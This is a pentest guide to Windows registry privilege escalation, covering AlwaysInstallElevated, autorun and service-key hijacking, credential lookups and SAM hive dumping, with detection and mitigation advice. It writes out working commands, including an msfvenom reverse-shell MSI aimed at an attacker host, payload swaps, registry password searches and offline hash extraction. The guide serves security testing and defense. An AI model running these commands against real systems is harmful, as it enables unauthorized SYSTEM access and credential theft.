Registry Exploits

Overview

The Windows registry stores system and application configuration. Misconfigured registry permissions, stored credentials, and special settings like AlwaysInstallElevated provide privilege escalation paths. Registry-based attacks are reliable because they target persistent configuration rather than transient conditions.

ATT&CK Mapping

• Tactic: TA0004 - Privilege Escalation
• Technique: T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
• Technique: T1574.011 - Hijack Execution Flow: Services Registry Permissions Weakness

Prerequisites

• Shell access on the target Windows system
• Registry read access (default for all authenticated users)
• Writable registry keys (for exploitation)

Techniques

AlwaysInstallElevated

When both AlwaysInstallElevated registry keys are set to 1, any user can install MSI packages with SYSTEM privileges:

:: Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

:: Both must return 0x1 for the exploit to work

If both are set to 1:

# On attacker machine, generate a malicious MSI
# Metasploit Framework
# https://github.com/rapid7/metasploit-framework
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f msi -o escalate.msi

:: On target, install the MSI (runs as SYSTEM)
msiexec /quiet /qn /i C:\Users\Public\escalate.msi

Autorun Registry Keys

If autorun registry entries point to binaries in writable locations:

:: Check autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

:: Check permissions on the referenced binaries
icacls "C:\Path\To\autorun.exe"

:: If writable, replace with payload
move "C:\Path\To\autorun.exe" "C:\Path\To\autorun.exe.bak"
copy payload.exe "C:\Path\To\autorun.exe"

:: Escalation occurs when the privileged user (or SYSTEM) logs in and the autorun executes

Service Registry Permissions

Each service has a registry key under HKLM\SYSTEM\CurrentControlSet\Services\. If a user can modify a service's registry key, they can change the ImagePath value:

:: Check registry permissions on a service
:: Using accesschk (Sysinternals)
accesschk.exe /accepteula -uvwqk "HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService"

:: Look for: KEY_ALL_ACCESS or KEY_SET_VALUE for non-admin users

:: Modify the service binary path via registry
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Public\payload.exe" /f

:: Restart the service
sc stop VulnerableService
sc start VulnerableService

Stored Credentials in Registry

:: Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon

:: PuTTY stored sessions (may contain proxy credentials)
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

:: VNC passwords (DES-encrypted)
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v Password
reg query "HKCU\SOFTWARE\TightVNC\Server" /v Password

:: SNMP community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities"

:: Search registry for "password"
reg query HKLM /f password /t REG_SZ /s 2>nul | findstr /i "password"
reg query HKCU /f password /t REG_SZ /s 2>nul | findstr /i "password"

SAM and SYSTEM Hive Backup

:: If running as SYSTEM or have SeBackupPrivilege
reg save HKLM\SAM C:\Users\Public\sam
reg save HKLM\SYSTEM C:\Users\Public\system

:: Check for Volume Shadow Copies (may contain old SAM)
vssadmin list shadows

# On attacker machine — extract hashes
# Impacket
# https://github.com/fortra/impacket
impacket-secretsdump -sam sam -system system LOCAL

Detection Methods

Network-Based Detection

• Not directly observable on the network

Host-Based Detection

• Monitor registry modification events (Sysmon Event ID 13 — Registry Value Set)
• Alert on modifications to service registry keys by non-admin users
• Monitor AlwaysInstallElevated policy changes
• Audit access to HKLM\SAM and HKLM\SECURITY hives

Mitigation Strategies

• Disable AlwaysInstallElevated — ensure both HKLM and HKCU keys are set to 0 or not present
• Restrict service registry permissions — service keys should be writable only by Administrators and SYSTEM
• Do not store credentials in registry — disable autologon, use credential managers
• Restrict autorun paths — ensure autorun binaries are in protected directories
• Monitor registry changes — use Sysmon or similar tools to track registry modifications

References

Pentest Guides & Research

• PayloadsAllTheThings - Windows Privilege Escalation

MITRE ATT&CK

• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
• T1574.011 - Hijack Execution Flow: Services Registry Permissions Weakness